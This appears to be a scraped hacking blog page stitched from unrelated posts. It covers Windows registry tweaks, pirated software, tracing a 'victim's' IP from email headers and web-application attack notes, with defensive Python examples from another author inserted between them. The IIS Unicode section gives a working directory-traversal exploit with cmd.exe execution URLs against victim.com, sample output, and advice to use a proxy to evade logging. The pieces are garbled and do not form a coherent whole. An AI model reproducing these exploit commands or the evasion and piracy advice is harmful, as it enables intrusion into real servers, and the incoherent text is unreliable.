Change Registered Owner Info On your Windows
Change Registered Owner Information
This is a small and simple registry tweak you can perform to change the registered owner information of your Windows installation if you entered it wrong during setup.
On the Run command, type regedit (regedt32 on some versions) and hit Enter to start the Registry Editor. First make a backup of your registry so that you are safe if any mistake is made. I would say, make a backup of the registry before any tweak to it.
Now go to:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion

Change Yahoo Messenger Title
Steps:
- Go to the folder where you have installed Yahoo Messenger (e.g. C:\Program Files\Yahoo!\Messenger)
- There you will find one file named 'ymsgr' (don't be confused by the other file names; there is only one file named 'ymsgr')
- Open the file, go to the end and write the following lines:
[APP TITLE]
CAPTION=ADNAN
(In place of ADNAN you can write your own name or any custom text)
- Save the file

Disable Right Click On your Desktop
This is a small and simple registry tweak you can perform to disable right-click on your desktop.
On the Run command, type regedit (regedt32 on some versions) and hit Enter to start the Registry Editor. First make a backup of your registry so that you are safe if any mistake is made. I would say, make a backup of the registry before any tweak to it.
Now go to:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Now add a DWORD value on the right side and name it NoViewContextMenu.
Give it the value 1.
Now exit the registry and restart your PC to see the effect. Isn't that cool?
If you want to enable right-click again, just delete the DWORD value or change its value to 0 and restart your computer.
CHEERS!

Windows XP NASA Second Generation SP3 2010 (New Links)
WINDOWS XP
The second generation of Windows XP NASA SP3 2010 comes with a new exclusive technology, used for the first time: "Automatic Recovery for Basic System Files on every Windows Boot", or "Self Maintenance". This means that every time Windows reboots, all basic system files are recovered automatically, as if Windows had just been installed for the first time, without affecting programs and other files and without taking additional time!
That's amazing! More use of Windows increases its speed and stability. Windows XP NASA Second Generation SP3 2010 is very fast and fully stable, with no system errors and high Internet speed. It brings more developments and improvements to all features and functions of the previous edition, "XP NASA SPACE v1.0 SP3 2010": VGA clarity, sound effects, graphics and multimedia, new multi-colour 3D themes, icons, 3D wallpapers and transparency.
Release Name: Windows XP NASA Second Generation SP3 2010

Finding IP From GMAIL Headers
When you send an email to any of your friends or to anyone else (could be your girlfriend, never mind) through an email client or webmail service such as Gmail, Yahoo Mail, Hotmail, AOL or Outlook Express, the message also carries an email header, which contains some important information for us, i.e. hackers.
Basically it is a feature of the mailing protocol.
Now when the victim sends you an email, whether through Gmail, Yahoo Mail or anything else, the mail arrives in your inbox complete with its email header, but your email client hides it and shows only the readable part.
Well, this article is about how to view email headers in Gmail. We will talk about the others in future too. Yeah, it's a kind of easy tutorial...
Finding IP address in Gmail
Login to your Gmail account with your username and password.
Open the mail.

Google Operating System 2010 (Android LiveCD - No Installation)
File: ISO
Size: 172.46 Mb
Checksums
MD5 E0C5C305F78CD958DBAEA3716C82296F
SHA-1 741B42748666AC085FC12692AC6AFB369B002A2E
CRC32 EEDBFF00

Change Google logo to your name
go to
http://www.google.com.pk
and now in the address bar type
http://www.shinysearch.com/randomlogo.php?ltext=ADNAN
replace ADNAN by your name

Megaupload and depositfiles premium hack

Phone Unlock v7.1
Most phones will need a data cable to connect your Handset to the PC.
Most models catered for
- Ericsson: (virtually all models covered)
- LG: (virtually all models covered)
- Mitsubishi: (virtually all models covered)
- Motorola: (virtually all models covered)
=> also V3 - Black, Blue, Green, Pink & Silver
- NEC: (virtually all models covered)
- Nokia: (virtually all models covered)
- Panasonic: (virtually all models covered)
- Philips: (virtually all models covered)
- Sagem: (virtually all models covered)
- Samsung: (virtually all models covered)
- Sharp: (Inc. GX’s) (virtually all models covered)
- Siemens: (virtually all models covered)
- Sony: (virtually all models covered)
You can do the upgrade at home or work with a USB cable in 20 minutes.
All you require is a 'USB to mini-USB' cable to connect your V3 handset to the PC;
this cable is normally provided with your phone.

400 Virus Source Codes - My Best Virus Code Collection
400 Virus Source Codes
- Avispa.dr
- Dark Avenger
- AVA.550
- Univ/a
- Auspar.377
- Auspar.338
- OC/oops
- Middle
- Auspar.635

Password Guessing
Attack Methods: Often web sites advise users to choose memorable passwords such as birthdays, names of friends or family, or social security numbers. This is extremely poor advice, as such passwords are easily guessed by an attacker who knows the user. The most common way an attacker will try to obtain a password is through a dictionary attack. In a dictionary attack, the attacker takes a dictionary of words and names and tries each one to see if it is the required password. This can be

Web Based Password Cracking Techniques
Once the information has been processed, Passport redirects the user to a page on Passport.net.
Note: However, Passport has been plagued with security issues, from reuse of the authentication cache to privacy-flouting activities. Apart from this, exploits that plague Microsoft-based web systems, such as Unicode exploits, cross-site scripting and cookie stealing, cast more than a shadow of doubt on this means of authentication.
It is a highly customizable authentication mechanism that uses a form composed of HTML with
After the data input via HTTP or SSL, it is evaluated by some server-side logic and if the credentials are valid, then a cookie is given to the client to be reused on subsequent visits.
Forms-based authentication is the most popular authentication technique on the Internet.
Note: Forms Authentication Flow
- WinSSLMiM is an HTTPS man-in-the-middle attack tool. It includes FakeCert, a tool to make fake certificates.
- It can be used to exploit the certificate chain vulnerability in Internet Explorer. The tool works under Windows 9x/2000.
- Usage: FakeCert: fc -h; WinSSLMiM: wsm -h
Note: When a web browser receives the certificate, it should verify that the CN field matches the domain it just connected to, and that it is signed by a known CA certificate. No man-in-the-middle attack is possible because it should not be possible to substitute a certificate with a valid CN and a valid signature. However, it is possible that the signing authority has been delegated to more localized authorities. In this case, the administrator of www.website.com will get a chain of certificates from the localized authority:
Attack Methods: However, as far as IE is concerned, anyone with a valid CA-signed certificate for any domain can generate a valid CA-signed certificate for any other domain. If an attacker wants to, he can generate a valid certificate and request a signature from VeriSign: [CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.attacker.com]
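The following is an added example, not code from the page or from any tool it names, showing the path-validation check that the flaw above comes down to: a certificate may only act as an issuer if its Basic Constraints mark it as a CA. Signatures are modelled with HMAC under a constructed per-name key registry that stands in for real key pairs; the names VeriSign, www.attacker.com and www.website.com come from the text, the function names are mine.

```python
import hashlib
import hmac
import json

# Constructed key registry: in this toy the same per-name key signs (issuer side) and
# verifies (relying-party side), standing in for a real key pair carried in each cert.
KEYS = {
    "VeriSign": b"toy-root-key",
    "www.attacker.com": b"toy-attacker-key",
}

def _to_be_signed(cert):
    return json.dumps({k: cert[k] for k in ("subject", "issuer", "is_ca")},
                      sort_keys=True).encode("utf-8")

def issue_cert(issuer, subject, is_ca):
    """issuer signs a certificate for subject; is_ca is the Basic Constraints CA flag."""
    cert = {"subject": subject, "issuer": issuer, "is_ca": is_ca}
    cert["sig"] = hmac.new(KEYS[issuer], _to_be_signed(cert), hashlib.sha256).hexdigest()
    return cert

def verify_chain(chain, trusted_roots, hostname, check_ca_flag=True):
    """chain is ordered leaf first; its last element must be issued by a trusted root.
    Returns (ok, reason). check_ca_flag=False reproduces the behaviour described above:
    every valid certificate is accepted as an issuer for the next one down."""
    if chain[0]["subject"] != hostname:
        return False, "CN does not match the host"
    for i, cert in enumerate(chain):
        issuer = cert["issuer"]
        parent = chain[i + 1] if i + 1 < len(chain) else None
        if parent is None:
            if issuer not in trusted_roots:
                return False, "chain does not end at a trusted root"
        elif parent["subject"] != issuer:
            return False, "issuer/subject mismatch at %s" % cert["subject"]
        elif check_ca_flag and not parent["is_ca"]:
            # This is the check the text says IE lacked.
            return False, "%s is not a CA and may not issue certificates" % parent["subject"]
        if issuer not in KEYS:
            return False, "no key for issuer %s" % issuer
        expected = hmac.new(KEYS[issuer], _to_be_signed(cert), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(cert["sig"], expected):
            return False, "bad signature on %s" % cert["subject"]
    return True, "ok"

def chain_vulnerability_demo():
    """Reconstructs the chain from the text: the root issues a plain (non-CA) certificate to
    www.attacker.com, whose holder then signs one for www.website.com with his own key."""
    attacker_leaf = issue_cert("VeriSign", "www.attacker.com", is_ca=False)
    forged = issue_cert("www.attacker.com", "www.website.com", is_ca=False)
    chain = [forged, attacker_leaf]
    lenient = verify_chain(chain, {"VeriSign"}, "www.website.com", check_ca_flag=False)
    strict = verify_chain(chain, {"VeriSign"}, "www.website.com")
    return lenient[0], strict[0], strict[1]

if __name__ == "__main__":
    print(chain_vulnerability_demo())
```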

What is a cookie?
Persistent cookies are stored in a text file (cookies.txt under Netscape and multiple *.txt files for Internet Explorer) on the client and are valid for as long as the expiry date is set for (see below). Non-Persistent cookies are stored in RAM on the client and are destroyed when the browser is closed or the cookie is explicitly killed by a log-off script.
Secure cookies can only be sent over HTTPS (SSL). Non-Secure cookies can be sent over HTTPS or regular HTTP. The title of secure is somewhat misleading. It only provides transport security. Any data sent to the client should be considered under the total control of the end user, regardless of the transport mechanism in use.

Authentication And Session Management
Attack Methods: Brute Force. Brute forcing involves performing an exhaustive key search of a web application authentication token's key space in order to find a legitimate token that can be used to gain access.
user-pass = userid ":" password
userid    = *<TEXT excluding ":">
password  = *TEXT
Authorization: Basic bjplc2vcGZQQWxRpVuIHhZGNFt==
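To make the user-pass grammar above concrete, here is an added example (my code, not from the page) that builds and parses Basic credentials; the Aladdin / "open sesame" pair is the RFC 2617 sample and the function names are mine. The point for defenders is that base64 is an encoding, not encryption: whoever captures the header recovers the password.

```python
import base64
import binascii

def build_basic_credentials(userid, password):
    """Encode user-pass exactly as the grammar says: base64(userid ":" password).
    The userid may not contain ':' because the first colon is the separator."""
    if ":" in userid:
        raise ValueError("userid must not contain ':'")
    user_pass = "%s:%s" % (userid, password)
    return "Basic " + base64.b64encode(user_pass.encode("utf-8")).decode("ascii")

def parse_basic_credentials(header_value):
    """Recover (userid, password) from an Authorization header value.
    Returns None for anything that is not well-formed Basic credentials.
    Nothing here is secret: anyone holding the header can do this."""
    scheme, _, encoded = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not encoded.strip():
        return None
    try:
        user_pass = base64.b64decode(encoded.strip(), validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None  # bad base64 alphabet/padding, or bytes that are not text
    userid, sep, password = user_pass.partition(":")
    if not sep:
        return None  # no separator, so this is not a user-pass production
    return userid, password

if __name__ == "__main__":
    header = build_basic_credentials("Aladdin", "open sesame")
    print(header, "->", parse_basic_credentials(header))
```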
Attack Methods: Session Replay. If a user's authentication tokens are captured or intercepted by an attacker, the session can be replayed by the attacker, making the concerned web application vulnerable to a replay attack. In a replay attack, an attacker openly uses the captured or intercepted authentication tokens, such as a cookie, to create or obtain service from the victim's account, thereby bypassing normal user authentication methods.
1. Visiting a pre-existing dynamically created URL that is assigned to a specific user's account and has been sniffed or captured from a proxy server log.
2. Visiting a specific URL with a preloaded authentication token (cookie, HTTP header value, etc.) captured from a legitimate user.
3. A combination of 1 and 2.
Attack Methods: Session Forging/Brute-Forcing Detection and/or Lockout. Many websites have prohibitions against unrestrained password guessing (e.g., they can temporarily lock the account or stop listening to the IP address). With regard to session token brute-force attacks, an attacker can probably try hundreds or thousands of session tokens embedded in a legitimate URL or cookie, for example, without a single complaint from the HTTP server. Many intrusion-detection systems do look for this type of attack; penetration tests also often overlook this weakness in web e-commerce systems. Designers can use "booby trapped" session tokens that never actually get assigned but will detect if an attacker is trying to brute-force a range of tokens. Anomaly/misuse detection hooks can also be built in to detect if an authenticated user tries to manipulate their token to gain elevated privileges.
Attack Methods: Session Re-Authentication. Critical user actions such as money transfers or significant purchase decisions should require the user to re-authenticate or be reissued another session token immediately prior to significant actions. Developers can also somewhat segment data and user actions to the extent where re-authentication is required upon crossing certain "boundaries", to prevent some types of cross-site scripting attacks that exploit user accounts.
Attack Methods: Session Token Transmission. If a session token is captured in transit through network interception, a web application account is then prone to a replay or hijacking attack. Typical web encryption technologies include, but are not limited to, the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLS v1) protocols, used to safeguard the state mechanism token.
Attack Methods: Session Tokens on Logout. With the popularity of Internet kiosks and shared computing environments on the rise, session tokens take on a new risk. A browser only destroys session cookies when the browser thread is torn down. Most Internet kiosks maintain the same browser thread. It is recommended to overwrite session cookies when the user logs out of the application.
Attack Methods: Page Sequencing. Page sequencing is the term given to the vulnerability that arises as a result of poor session management, thereby allowing the user to take an out-of-turn action and bypass the defined sequence of web pages. This can be something like moving ahead to a later stage of a financial transaction. This arises due to faulty session/application state management.
- The user is logged on to a web application and the session is currently active. An attacker knows of an XSS hole that affects that application.
- The user receives a malicious XSS link via e-mail or comes across it on a web page. In some cases an attacker can even insert it into web content (e.g. a guest book, banner, etc.) and make it load automatically without requiring user intervention.
Attack Methods: It is a fact that most web sites address security using SSL for authenticating their login sessions. Let us see how this process takes place. When the client connects to a web site, two events take place to ensure security.
- The web site must prove that it is the web site it claims to be.
- The user must authenticate himself to the web site.

- Persistent and Secure
- Persistent and Non-Secure
- Non-Persistent and Secure
- Non-Persistent and Non-Secure

What is Cross-Site Scripting (XSS)?
The simplest description of cross-site scripting is an attack that occurs when a user enters malicious data into a web site. It can be as simple as posting a message that contains malicious code to a newsgroup. When another person views this message, the browser will interpret the code and execute it, often giving the attacker control of the system. Malicious scripts can also be executed automatically based on certain events, such as when a picture loads. Unlike most security vulnerabilities, XSS doesn't apply to any single vendor's products; instead, it can affect any software that runs on a web server.
As a web application user, there are a few ways to protect yourself from XSS attacks.
- The first and most effective solution is to disable all scripting language support in your browser and email reader.
- If this is not a feasible option for business reasons, another recommendation is to use reasonable caution while clicking links in anonymous e-mails and dubious web pages.
- Proxy servers can help filter out malicious scripting in HTML.
Preventing cross-site scripting is a challenging task, especially for large distributed web applications. If the application accepts only expected input, then XSS can be significantly reduced. Web servers should set the character set, and then make sure that the data they insert is free from byte sequences that are special in the specified encoding. This can typically be done by settings in the application server or web server. The server should define the character set in each HTML page as below. Web pages with unspecified character encoding work mostly because most character sets assign the same characters to byte values below 128. Some 16-bit character-encoding schemes have additional multi-byte representations for special characters such as "<". These should be checked.

Input Manipulation : Web Application Vulnerabilities
In the context of a web-based attack (or web server attack), the attacker will first try to probe and manipulate the input fields to gain access to the web server. They can be broadly categorized as given below.

Web Application Vulnerabilities
Understanding Web Application Security
Common Web Application Security Vulnerabilities
Web Application Penetration Methodologies
Input Manipulation
Authentication And Session Management
Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth
Countermeasures
Web-based application security differs from the general discussion on security. In the general context, usually an IDS and/or firewall lends some degree of security. However, in the case of web applications, the session takes place through the allowed port, the default web server port 80. This is equivalent to establishing a connection without a firewall. Even if encryption is implemented, it only encrypts the transport protocol, and in the event of an attack the attacker's session will simply be encrypted as well. Encryption does not thwart the attack.
- Reliability of Client-Side Data
- Special Characters that have not been escaped
- HTML Output Character Filtering
- Root accessibility of web applications
- ActiveX/JavaScript Authentication
- Lack of User Authentication before performing critical tasks
Threat: Reliability of Client-Side Data. It is recommended that the web application rely on server-side data for critical operations rather than client-side data, especially for input purposes.
Threat: Special Characters that have not been escaped. Often this aspect is overlooked, and special characters that can be used by attackers to modify the instructions are found in the web application code. For example, UTF-7 provides an alternative encoding for "<" and ">", and several popular browsers recognize these as the start and end of a tag.
Threat: HTML Output Character Filtering. Output filtering helps a developer build an application which is not susceptible to cross-site scripting attacks. When information is displayed to users, it should be escaped. HTML should be rendered inactive to prevent cross-site scripting attacks.
Threat: Root accessibility of web applications. Ideally web applications should not expose the root directory of the web server. Sometimes it is possible for the user to access the root directory if he can manipulate the input or the URL.
Threat: ActiveX/JavaScript Authentication. Client-side scripting languages are vulnerable to attacks such as cross-site scripting.
Threat: Lack of User Authentication before performing critical tasks. An obvious security lapse, where restricted-area access is given without proper authentication, reuse of the authentication cache, or poor logout procedures. These applications can be vulnerable to cookie-based attacks.
- Information Gathering and Discovery
  - Documenting Application / Site Map
  - Identifiable Characteristics / Fingerprinting
  - Signature Error and Response Codes
- File / Application Enumeration
  - Forced Browsing
  - Hidden Files
  - Vulnerable CGIs
  - Sample Files
Input/Output Client-Side Data Manipulation
- Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer!
- The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.
Instant Source is an application that lets the user view the underlying source code as he browses a web page. The traditional way of doing this has been the View Source command in the browser. However, the process was tedious, as the viewer had to parse the entire text file if he was searching for a particular block of code. Instant Source allows the user to view the code for the selected elements instantly without having to open the entire source.
- Lynx is a text-based browser used for downloading source files and directory links.
Lynx is a text browser client for users running cursor-addressable, character-cell display devices. It can display HTML documents containing links to files on the local system, as well as files on remote systems running http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and services accessible via logins to telnet, tn3270 or rlogin accounts. Current versions of Lynx run on UNIX, VMS, Windows 3.x/9x/NT, 386DOS and OS/2 EMX.
- Wget is a command line tool for Windows and Unix that will download the contents of a web site.
- It works non-interactively, so it will work in the background, after the user has logged off.
- Wget works particularly well with slow or unstable connections by continuing to retrieve a document until the document is fully downloaded.
- Both http and ftp retrievals can be time-stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.
GNU Wget is a freely available network utility to retrieve files from the Internet using HTTP and FTP. It works non-interactively, allowing work to continue in the background after the user has logged off. The recursive retrieval of HTML pages, as well as FTP sites, is supported. It can be used to make mirrors of archives and home pages, or to traverse the web like a WWW robot.
- Black Widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program.
- Use it to scan a site and create a complete profile of the site's structure, files, e-mail addresses, external links and even link errors.
Another tool that can be found in an attacker's arsenal is Black Widow. This tool can be used for various purposes because it functions as a web site scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program. Note its use as a site mirroring tool. An attacker can use it to mirror the target site on his hard drive and parse it for security flaws in offline mode.
- WebSleuth is an excellent tool that combines spidering with the capability of a personal proxy such as Achilles.
WebSleuth is a tool that combines web crawling with the capability of a personal proxy. The current version of WebSleuth supports functionality to: convert hidden and select form elements to textboxes; efficient forms parsing and analysis; edit the rendered source of web pages; edit raw cookies in their raw state, etc.
- Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server.
- Hidden fields serve as a means for the web application to pass information between different applications.
- Using this method, an application may pass the data without saving it to a common backend system (typically a database).
- A major assumption about hidden fields is that since they are not visible (i.e. hidden) they will not be viewed or changed by the client.
- Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server.
- By changing the value, the entire logic between the different application parts is manipulated to the new value, and the application is damaged.
Hidden field tampering: Most of us who have dabbled with some HTML coding have come across the hidden field. For example, consider the code below:
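The page's own code sample did not survive; as an added example of a hidden-field defence (my code, not the page's), the server signs each hidden value with an HMAC bound to the field name when it emits the form and verifies it on the POST, so a value edited by the client is detected. The key, field names and form values are constructed.

```python
import hashlib
import hmac
import html
from urllib.parse import parse_qsl

# Constructed server-side secret; load it from configuration in a real deployment.
SERVER_KEY = b"constructed-demo-key-change-me"

def _mac(name, value, key):
    # Bind the field name into the MAC so a signed value cannot be moved to another field.
    return hmac.new(key, ("%s=%s" % (name, value)).encode("utf-8"), hashlib.sha256).hexdigest()

def sign_hidden_field(name, value, key=SERVER_KEY):
    """Value to emit in the hidden input: the value followed by its MAC."""
    return "%s.%s" % (value, _mac(name, value, key))

def verify_hidden_field(name, submitted, key=SERVER_KEY):
    """Return the original value if the submitted field is authentic, otherwise None."""
    value, sep, mac = submitted.rpartition(".")
    if not sep:
        return None  # no MAC at all: the client rewrote the field
    if not hmac.compare_digest(mac, _mac(name, value, key)):
        return None  # value or MAC altered, or the MAC belongs to another field
    return value

def hidden_input(name, value):
    """Render the hidden field as the page would emit it."""
    signed = sign_hidden_field(name, value)
    return '<input type="hidden" name="%s" value="%s">' % (html.escape(name, quote=True),
                                                         html.escape(signed, quote=True))

def parse_post_body(body):
    """Minimal application/x-www-form-urlencoded parser for the demo."""
    return dict(parse_qsl(body, keep_blank_values=True))

def checkout_price(form, name="price"):
    """Server-side handling of the POST: use the hidden price only if its MAC verifies."""
    value = verify_hidden_field(name, form.get(name, ""))
    return None if value is None else float(value)

if __name__ == "__main__":
    field = hidden_input("price", "19.99")
    print(field)
    print(checkout_price(parse_post_body("item=42&price=" + sign_hidden_field("price", "19.99"))))
    print(checkout_price({"price": "0.01"}))
```

A signed value can still be replayed from an older form; bind the session id or an expiry into the MAC input where that matters.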

Top20 Scan Method : Hacking Web Servers
- WebInspect is an impressive web server and application-level vulnerability scanner which scans for over 1500 known attacks.
- It checks site contents and analyzes for rudimentary application issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks.
- It can analyze a basic web server in 4 minutes, cataloging over 1500 HTML pages.
- The security scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's Internet, intranet and extranet environments.
- Shadow Security Scanner includes vulnerability auditing modules for many systems and services. These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP, LDAP, TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL, IBM DB2, Oracle, MySQL, PostgreSQL, Interbase, MiniSQL and
IISLockdown:
- IISLockdown restricts anonymous access to system utilities as well as the ability to write to web content directories.
- It disables Web Distributed Authoring and Versioning (WebDAV).
- It installs the URLScan ISAPI filter.
URLScan:
URLScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator.
- Web servers assume critical importance in the realm of Internet security.
- Vulnerabilities exist in different releases of popular web servers, and the respective vendors patch these often.
- The inherent security risks owing to compromised web servers have an impact on the local area networks that host these web sites, and even on normal users of web browsers.
- Looking through the long list of vulnerabilities that have been discovered and patched over the past few years gives an attacker ample scope to plan attacks on unpatched servers.
- Different tools and exploit codes aid an attacker in perpetrating web server hacking.
- Countermeasures include scanning for existing vulnerabilities and patching them immediately, anonymous access restriction, and incoming traffic request screening and filtering.

Canonicalization : Vulnerability : Exploit : Unicode
- To begin, the attacker copies "..\..\winnt\system32\cmd.exe" to "..\..\interpub\scripts\cmd1.exe".
- He appends the command to the valid URL. Vulnerable IIS returns: "CGI Error ... 1 file(s) copied." The specified CGI application does not return a complete set of HTTP headers; instead it returns the above error.
- Next the attacker runs "cmd1.exe /c echo abc >aaa & dir & type aaa" along with the URL to list the directory contents. Vulnerable IIS returns:
Directory of c:\inetpub\scripts
10/25/2000 03:48p .
10/25/2000 03:48p ..
10/25/2000 03:51p 6 aaa
12/07/1999 05:00a 236,304 cmd1.exe
...
abc
- ASCII characters for the dots are replaced with their hexadecimal equivalent (%2E).
- ASCII characters for the slashes are replaced with a Unicode equivalent (%c0%af).
- Unicode 2.0 allows multiple encoding possibilities for each character.
- Unicode for "/": 2f, c0af, e080af, f08080af, f8808080af, ...
- Overlong Unicode forms are not malformed, but they are not allowed by a correct Unicode encoder and decoder.
- They are maliciously used to bypass filters that only check the short Unicode form.
- A writeable or executable directory is available, allowing attackers to upload malicious code.
- A system executable such as cmd.exe is available on the root and does not have an access control list applied to it.
- IIS logs all visits in log files. The log file is located at <%systemroot%>\logfiles
- Be careful: if you don't use a proxy, your IP will be logged.
- This command lists the log files:
http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Winnt\system32\Logfiles\W3SVC1
Capturing and maintaining log files is critical to the secure administration of a web server. While it is generally considered that the log does not capture an intrusion until after the request has been processed, a diligent administrator might couple logging with tools such as URLScan, which will make logging more effective. Here, we will discuss some of the best practices that can be followed when it comes to IIS logs. The best way to emphasize the value and importance of IIS log files is to draw a comparison to a crime scene: while handling IIS logs, they must be treated as if they were already evidence. Coupling IIS logs with other monitoring records such as firewall logs, IDS logs, and even tcpdump captures lends more credibility in the event of the log being used as evidence.
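As an added example (my code, neither the page's nor IIS's) of the canonicalization lesson from the Unicode section and the logging point above: decode the request path fully first, reject overlong UTF-8 and traversal on the decoded form, and run the same check over log lines to flag past attempts. WEB_ROOT and the W3C field layout of the sample log are constructed assumptions.

```python
import posixpath
from urllib.parse import unquote_to_bytes

WEB_ROOT = "/inetpub/wwwroot"  # constructed document root for the demo

def canonicalize_request_path(raw_path):
    """Return the canonical on-disk path for a request, or raise ValueError.
    Order matters: decode fully first, then check. Strict UTF-8 decoding
    rejects overlong forms such as %c0%af, and the traversal test runs on the
    decoded text, which is the order the vulnerable server got wrong."""
    try:
        decoded = unquote_to_bytes(raw_path).decode("utf-8")
    except UnicodeDecodeError as exc:
        raise ValueError("invalid or overlong UTF-8 in path: %s" % exc.reason)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    decoded = decoded.replace("\\", "/")  # IIS treats both separators alike
    if any(segment == ".." for segment in decoded.split("/")):
        raise ValueError("traversal segment in path")
    canonical = posixpath.normpath("/" + decoded.lstrip("/"))
    full = posixpath.normpath(WEB_ROOT + canonical)
    if full != WEB_ROOT and not full.startswith(WEB_ROOT + "/"):
        raise ValueError("path escapes the web root")
    return full

def is_safe_request_path(raw_path):
    """Boolean wrapper for filters that only need accept/reject."""
    try:
        canonicalize_request_path(raw_path)
        return True
    except ValueError:
        return False

def scan_iis_log(lines):
    """Flag log entries whose cs-uri-stem fails canonicalization.
    Constructed W3C field layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        date, time, client_ip, method, uri_stem, _query, status = fields[:7]
        try:
            canonicalize_request_path(uri_stem)
        except ValueError as exc:
            findings.append({"time": "%s %s" % (date, time), "client": client_ip,
                             "method": method, "uri": uri_stem, "status": status,
                             "reason": str(exc)})
    return findings

# Constructed sample log: two ordinary requests and two that should be flagged.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-10-25 15:48:01 10.0.0.5 GET /default.htm - 200
2000-10-25 15:48:09 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2000-10-25 15:48:12 10.0.0.5 GET /scripts/%2e%2e/%2e%2e/winnt/win.ini - 404
2000-10-25 15:48:20 10.0.0.7 GET /images/logo.gif - 200
"""

if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG.splitlines()):
        print("%(time)s %(client)s %(uri)s -> %(reason)s" % finding)
```

The scanner decodes each URI once; a server that decodes twice needs the check applied to the second decoding as well.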
